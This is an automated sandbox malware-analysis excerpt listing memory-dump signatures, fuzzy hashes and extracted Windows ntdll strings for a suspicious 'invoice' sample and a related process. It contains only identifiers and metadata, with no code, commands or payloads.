                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5f68fb2efff01ec04c444321d51e25f3b1aec880208ca57af16f163f86ede3c9
                                  • Instruction ID: dbaffb94da069cd9e84f4b9fef4c183ac15be4704349677fa0c9aba82407fc12
                                  • Opcode Fuzzy Hash: 5f68fb2efff01ec04c444321d51e25f3b1aec880208ca57af16f163f86ede3c9
                                  • Instruction Fuzzy Hash: 5D90027120150842D10071584404B4A000D97F0301F56C016A4124654DC619C9517621
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6862638baac8faf045e1d142b7c0baed3c4f102ac7a0719fe9b2f47f23e7a399
                                  • Instruction ID: 80a1420f4201f7d8cd499bf230eb68446adf8023cd254ea8bd3a1e93799a8a04
                                  • Opcode Fuzzy Hash: 6862638baac8faf045e1d142b7c0baed3c4f102ac7a0719fe9b2f47f23e7a399
                                  • Instruction Fuzzy Hash: A790027120190402D1007158480874B000D97E0302F56C011A9164555EC669C9916631
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 53eef07869a1092c6913729185a2587191f20c702ce73c811f41a3cc5831f1cd
                                  • Instruction ID: be9a9048dda0f05067636d93095e5b880f6d5581514472364570eec15059fc42
                                  • Opcode Fuzzy Hash: 53eef07869a1092c6913729185a2587191f20c702ce73c811f41a3cc5831f1cd
                                  • Instruction Fuzzy Hash: 469002616015004241407168884490A400DBBF1211B56C121A4998550DC55D89655765
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2e187b0321cb4ef431b1630be49b90067566610cd40c85b2fa796a0def525748
                                  • Instruction ID: 6815333802ff670337643359f1959ed4e38d970bcb4a8c7231117a7a36f49ec9
                                  • Opcode Fuzzy Hash: 2e187b0321cb4ef431b1630be49b90067566610cd40c85b2fa796a0def525748
                                  • Instruction Fuzzy Hash: 4190027120190402D1007158481470F000D97E0302F56C011A5164555DC62989516671
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e212bd7027eade9dd06dcd5d7c5cac6eb9b2f941b29366d5d02c427447afe919
                                  • Instruction ID: 7ec55d577abe037cf9f2db5e56ecc8af068007ebfa34ae07b2aadea3a079008b
                                  • Opcode Fuzzy Hash: e212bd7027eade9dd06dcd5d7c5cac6eb9b2f941b29366d5d02c427447afe919
                                  • Instruction Fuzzy Hash: 14900261211D0042D20075684C14B0B000D97E0303F56C115A4154554CC91989615621
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f819fa71afaa9e74ddd74a03fdd813732b0a1e238eb9541de692d8f88ef20444
                                  • Instruction ID: 96bafbb37fafe155283ce66a5fc7a34f951332568b5e55869bf45a7720ed6494
                                  • Opcode Fuzzy Hash: f819fa71afaa9e74ddd74a03fdd813732b0a1e238eb9541de692d8f88ef20444
                                  • Instruction Fuzzy Hash: 449002A134150442D10071584414B0A000DD7F1301F56C015E5064554DC61DCD526226
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 72886bc215fac8ca1b9977e3547f88c2b069f3dc4b9dd769317c1eb3415f528c
                                  • Instruction ID: 93f5ca818798779bc6b928458d21fcc46ead008b749302dfd5c5c4f676ef5118
                                  • Opcode Fuzzy Hash: 72886bc215fac8ca1b9977e3547f88c2b069f3dc4b9dd769317c1eb3415f528c
                                  • Instruction Fuzzy Hash: 209002A121150042D1047158440470A004D97F1201F56C012A6154554CC52D8D615225
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9b1b1c015d5ea17786c239100fc935ffea883dd2e1deeed1044f01d6cad6c0f3
                                  • Instruction ID: b3761f43a40b68028872f9beb38c6f66c9a1ce7c535b851ad352875f6b73e65e
                                  • Opcode Fuzzy Hash: 9b1b1c015d5ea17786c239100fc935ffea883dd2e1deeed1044f01d6cad6c0f3
                                  • Instruction Fuzzy Hash: B99002B120150402D1407158440474A000D97E0301F56C011A9064554EC65D8ED56765
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a2d4a394290cbbb04a91b124cc8093b2a9555e0fa79c3b746648d2ffe9e13778
                                  • Instruction ID: 92b39002324cefc2da020ad07afd36bf866e387799ee0117d6ef205d6c4c5843
                                  • Opcode Fuzzy Hash: a2d4a394290cbbb04a91b124cc8093b2a9555e0fa79c3b746648d2ffe9e13778
                                  • Instruction Fuzzy Hash: 3D90026160150502D1017158440461A000E97E0241F96C022A5024555ECA298A92A231
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fb835cf131772bc7f85cf166da847273defb49c6e7852b5f23b18958bdccf0dc
                                  • Instruction ID: 5095f78cb13efeba80d77a9f7218fa67c601af4a250eea49c101c0da670ea70e
                                  • Opcode Fuzzy Hash: fb835cf131772bc7f85cf166da847273defb49c6e7852b5f23b18958bdccf0dc
                                  • Instruction Fuzzy Hash: 019002A120190403D1407558480460B000D97E0302F56C011A6064555ECA2D8D516235
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 42e14c9b37b84c4fd9ebd0f1205919ecafa2c8a9cdd7d4a554211c156bbcbfd4
                                  • Instruction ID: 85f49e96556bfa1a8dbf3805a739bec86276f8e0e3e8bd2cc42bf8875512f5fb
                                  • Opcode Fuzzy Hash: 42e14c9b37b84c4fd9ebd0f1205919ecafa2c8a9cdd7d4a554211c156bbcbfd4
                                  • Instruction Fuzzy Hash: 4D90026130150402D1027158441460A000DD7E1345F96C012E5424555DC6298A53A232
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c6c985135faabd83cf04d9f4a62f6ab9f75099101fd0adc216c8ff431f555910
                                  • Instruction ID: b357a39d53c17fe82e0ab7195ff044dca12401e93a1719f05e6caa073c03dfb3
                                  • Opcode Fuzzy Hash: c6c985135faabd83cf04d9f4a62f6ab9f75099101fd0adc216c8ff431f555910
                                  • Instruction Fuzzy Hash: 8F90026124150802D1407158841470B000ED7E0601F56C011A4024554DC61A8A6567B1
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: 05e745d8fb3074afeb176af085a784e0ff6667cf1336c392dfd7f4e51b9ef9f0
                                  • Instruction ID: ed4695f86c3d5f3d6bd0c58b2b486b0a542480d2d72d23fd327516d6420e87cc
                                  • Opcode Fuzzy Hash: 05e745d8fb3074afeb176af085a784e0ff6667cf1336c392dfd7f4e51b9ef9f0
                                  • Instruction Fuzzy Hash: 3D510AB5A04116FFDB56DFACC980A7EFBB8BB48240714812AF965D7641D334DE4087E0
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: 7d6a87d4cbcd25e23cc5ed0db03163794dfaf3c89c040a9611c12184e6469360
                                  • Instruction ID: c99c53a3b3f968b96d1f533e0d622556a07165ade9e185cbe778e80d7aedee7e
                                  • Opcode Fuzzy Hash: 7d6a87d4cbcd25e23cc5ed0db03163794dfaf3c89c040a9611c12184e6469360
                                  • Instruction Fuzzy Hash: 12510775A00649AFDB31DF6CCA90A7FFBF8EF54600B04846FE496D7682D674DA408760
                                  Strings
                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01A84655
                                  • Execute=1, xrefs: 01A84713
                                  • ExecuteOptions, xrefs: 01A846A0
                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01A84742
                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01A84725
                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01A846FC
                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 01A84787
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                  • API String ID: 0-484625025
                                  • Opcode ID: 97353e4e1d8ca1cc933fec83924debdd439245827c76b1d7a46ce2bc34124ab8
                                  • Instruction ID: 288f6604016c6858955ee144bf030e6d9c1225e1151eb97d23cb90977847761f
                                  • Opcode Fuzzy Hash: 97353e4e1d8ca1cc933fec83924debdd439245827c76b1d7a46ce2bc34124ab8
                                  • Instruction Fuzzy Hash: CB51183160025ABBEF21EBE9DD85FAA77B9EF98304F0400A9D605A7181EB709A458F50
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-$0$0
                                  • API String ID: 1302938615-699404926
                                  • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                  • Instruction ID: e244075547fc5ac0e3894e226ab8bb8d2732dc9ff8578af76728c1d5c4fb8f25
                                  • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                  • Instruction Fuzzy Hash: 65819F70E0A2499EEF658F6CC8917BEBBB3AF45322F1C4159DC61A76D1C73498408B71
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$[$]:%u
                                  • API String ID: 48624451-2819853543
                                  • Opcode ID: 1c613d767c6bdd36229200d7c4c80ab5fe753fc6926ec8c460294d9ac4ce6a82
                                  • Instruction ID: a850e7029d9a5c32088b3970bc5cf10e53031dcab4d3c31ecc098092188453ff
                                  • Opcode Fuzzy Hash: 1c613d767c6bdd36229200d7c4c80ab5fe753fc6926ec8c460294d9ac4ce6a82
                                  • Instruction Fuzzy Hash: F421477AA00219ABDB11DF79DD40AFE7BF8EF94A54F45011AEE05E3240E730D9018BA1
                                  Strings
                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01A802E7
                                  • RTL: Re-Waiting, xrefs: 01A8031E
                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01A802BD
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                  • API String ID: 0-2474120054
                                  • Opcode ID: 13b5a5365340664a713f63952fe692d9764f26633a3a34198759c9a99b5b469c
                                  • Instruction ID: 7e6d18add7100dd1dfe8f5f8c0988c3f37c3867f8a6ac5716fe580d37a633ee8
                                  • Opcode Fuzzy Hash: 13b5a5365340664a713f63952fe692d9764f26633a3a34198759c9a99b5b469c
                                  • Instruction Fuzzy Hash: A3E1AE70A187429FD726DF28C984B2ABBE0BF84324F140A5DF5A5CB2E1D774D849CB42
                                  Strings
                                  • RTL: Resource at %p, xrefs: 01A87B8E
                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01A87B7F
                                  • RTL: Re-Waiting, xrefs: 01A87BAC
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 0-871070163
                                  • Opcode ID: d6a30808e2edc480fac41cafb304bf5819033d1ca048955275b0335af2798ce1
                                  • Instruction ID: c1a244abf2a8935d3fe6922d8c658a40f4e8c45e50a49d2b4c1825a54d7d8c77
                                  • Opcode Fuzzy Hash: d6a30808e2edc480fac41cafb304bf5819033d1ca048955275b0335af2798ce1
                                  • Instruction Fuzzy Hash: 3441D3353047029FDB25DF29C941B6AB7E5EFD8720F100A1DFA5ADB680DB31E8458BA1
                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A8728C
                                  Strings
                                  • RTL: Resource at %p, xrefs: 01A872A3
                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01A87294
                                  • RTL: Re-Waiting, xrefs: 01A872C1
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 885266447-605551621
                                  • Opcode ID: e8b1deb3e1308f3575790e46e28ce152002c1739aebe4b425ee3f6c1238634c3
                                  • Instruction ID: 682c6cc000a70980d39856d040641319f9efbe2c15e7f172e1b072c08de6fecf
                                  • Opcode Fuzzy Hash: e8b1deb3e1308f3575790e46e28ce152002c1739aebe4b425ee3f6c1238634c3
                                  • Instruction Fuzzy Hash: D1410231700202ABDB21EF69CD41B6ABBA5FB94710F240619F955EB241EB31F852CBE1
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$]:%u
                                  • API String ID: 48624451-3050659472
                                  • Opcode ID: d0487122adff7a578a4b22d87e3345ca0336cac1325236a2ad51991155a89f2a
                                  • Instruction ID: 76cb125fe9d04974f962c879fe7a69875924746b72e84374a2ab64c50d19c846
                                  • Opcode Fuzzy Hash: d0487122adff7a578a4b22d87e3345ca0336cac1325236a2ad51991155a89f2a
                                  • Instruction Fuzzy Hash: F5317876A002199FDB21DF2DDD40BEEB7F8FF54610F44459AE949E3240EB309A548BA0
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-
                                  • API String ID: 1302938615-2137968064
                                  • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                  • Instruction ID: 65b931881f94545dcf87752103bb880187d8517a086c2e8ccde55199b6265822
                                  • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                  • Instruction Fuzzy Hash: D091C371E082169BEFA4DFADC880ABEBBB5AF44320F94451AED55B72C0D7348944CB50
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $$@
                                  • API String ID: 0-1194432280
                                  • Opcode ID: 029c7a592be295e9803f637ae1c965f9221b9bad24f497919bf20a86c84c4f64
                                  • Instruction ID: a7fe8abbc1640089eed7c7d70b8350a32a9110b4513f3a5b2e9bff56ae740e94
                                  • Opcode Fuzzy Hash: 029c7a592be295e9803f637ae1c965f9221b9bad24f497919bf20a86c84c4f64
                                  • Instruction Fuzzy Hash: 3481FB71D002699BDB35DB54CD44BEAB7B8AB48754F0441EAEA1EB7280E7705E84CFA0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: %M$1p$2c$4$5$$6F$@$C$G$Pf$V$$W-$^0$n\${v$}m%M$Q$g$j$r
                                  • API String ID: 0-2444733925
                                  • Opcode ID: ed6d15d1513750365a0994ca2ebccd9980f5fde2808f833e2aafc9943e0c7bf3
                                  • Instruction ID: 9888f3ff0a05f99f0e57cf4d15d7d91e8b90258dbe16bbf8032fde33a842001c
                                  • Opcode Fuzzy Hash: ed6d15d1513750365a0994ca2ebccd9980f5fde2808f833e2aafc9943e0c7bf3
                                  • Instruction Fuzzy Hash: 40229DB0D05229CFEB24CF44CA98BEDBBB2FB44308F1081D9C6596B281D7B55A89CF55
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 6$O$S$\$s
                                  • API String ID: 0-3854637164
                                  • Opcode ID: 1cd713b9cf033ac37d51d853ba1a8109c06bdfd4ef25ff915f2c33d337fb3518
                                  • Instruction ID: 226634d9ba74b11e84114672f9ea4efcadd000cb3595bb9e49d53e5cf639da77
                                  • Opcode Fuzzy Hash: 1cd713b9cf033ac37d51d853ba1a8109c06bdfd4ef25ff915f2c33d337fb3518
                                  • Instruction Fuzzy Hash: 4751A276D01218AEDB10DFD4DC48EEAB3B8EB44711F148199ED09AA140E771AA588BE1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 4o
                                  • API String ID: 0-670997953
                                  • Opcode ID: b4ca94f05c80aef0a6370f463dc310660186388fc7924d436637752397ebbe2f
                                  • Instruction ID: a7066f43050b75aca02ddeacc91742416bc62a96bfac30c27bf3a7d17e5a6ad9
                                  • Opcode Fuzzy Hash: b4ca94f05c80aef0a6370f463dc310660186388fc7924d436637752397ebbe2f
                                  • Instruction Fuzzy Hash: 0D11D0B6D11219AF8B00DFA9D8419EFB7F9EF48210F14466EE915E7240E7705A148BE4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: [
                                  • API String ID: 0-3431493590
                                  • Opcode ID: 3987aa50357aff267e7eda2e7c9f7792c107fdea569a1d4289cc59a4af7eb68f
                                  • Instruction ID: 71956721a59dde8cfe98ea5bf3019d34d8faa8e13396b1e34e2cc300c5a1af59
                                  • Opcode Fuzzy Hash: 3987aa50357aff267e7eda2e7c9f7792c107fdea569a1d4289cc59a4af7eb68f
                                  • Instruction Fuzzy Hash: 8411E9B6D01218AF8B00EFA9DC419EEBBF9EF48610F14456EE919E7200E7705A158BA4
                                  • Instruction ID: f7b315a4fbaa0775bd3fe6fe30364c224d25e956e97f01d56025355838cbf415
                                  • Opcode Fuzzy Hash: 268360e6d5dae3dee57ec2d64a3d90c9378c9bd2b95fab2dd17d2ba609b5bacd
                                  • Instruction Fuzzy Hash: 2B2103B6D01219AF8B00DFA9D9409EFB7F9EF88210F14456EE919E7200E7705A05CFE0
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8b63602ec757a2835487765709a7b6045621a46dab860d58063d5b339089cbc5
                                  • Instruction ID: 762da8e02e69ee1c526df588d125b2dee6ead768bfee27643f5bb3edc2903ac0
                                  • Opcode Fuzzy Hash: 8b63602ec757a2835487765709a7b6045621a46dab860d58063d5b339089cbc5
                                  • Instruction Fuzzy Hash: 8911BF76A017486FD720EBA8CC45FEFB7BCEF84700F004549F958AB284E771A9118BA0
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3b266a29c805ea6cae8c6a2e1dbaa422ad074ce3ee38de5f05a4a4822d3349f2
                                  • Instruction ID: 1093c4419b6f8fb9351273f372c1265cfd961b7402b28b9486b4b457940acb90
                                  • Opcode Fuzzy Hash: 3b266a29c805ea6cae8c6a2e1dbaa422ad074ce3ee38de5f05a4a4822d3349f2
                                  • Instruction Fuzzy Hash: 84110AB6D0121CAF8B00DFA9DC409EEBBF9EF48210F14466EE909E7200E7715A148BA5
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8c064da1e8d26660f3a4b95f4f60f5eb0a1f93cae81ea972cdf9a2943b9d78ad
                                  • Instruction ID: bd6b4db15c8166f6849b3885fe6dcc8f73ad3eee88ebce35ec4c85fcdf8597cc
                                  • Opcode Fuzzy Hash: 8c064da1e8d26660f3a4b95f4f60f5eb0a1f93cae81ea972cdf9a2943b9d78ad
                                  • Instruction Fuzzy Hash: F00184BBA013286BD714EB68DC49DEF736CDF48211F140255FD149B280FA70AE6186E1
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f8d39a70e7a326d00996aa242ebb41c312e8b420268ed862805266e53e42b436
                                  • Instruction ID: 112ec3aa975b0dc0e869d3f01273fae169f52de3954b59b269f2d9564fa173c0
                                  • Opcode Fuzzy Hash: f8d39a70e7a326d00996aa242ebb41c312e8b420268ed862805266e53e42b436
                                  • Instruction Fuzzy Hash: 730196B6204108BBDB54DF99DC81EDB77ADAF8C754F008608FA09E7241D671F8518BA4
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 636ea438d664245b2df1dbabcf74092c1610cba3c9aaa36eae25e07fc8a6632e
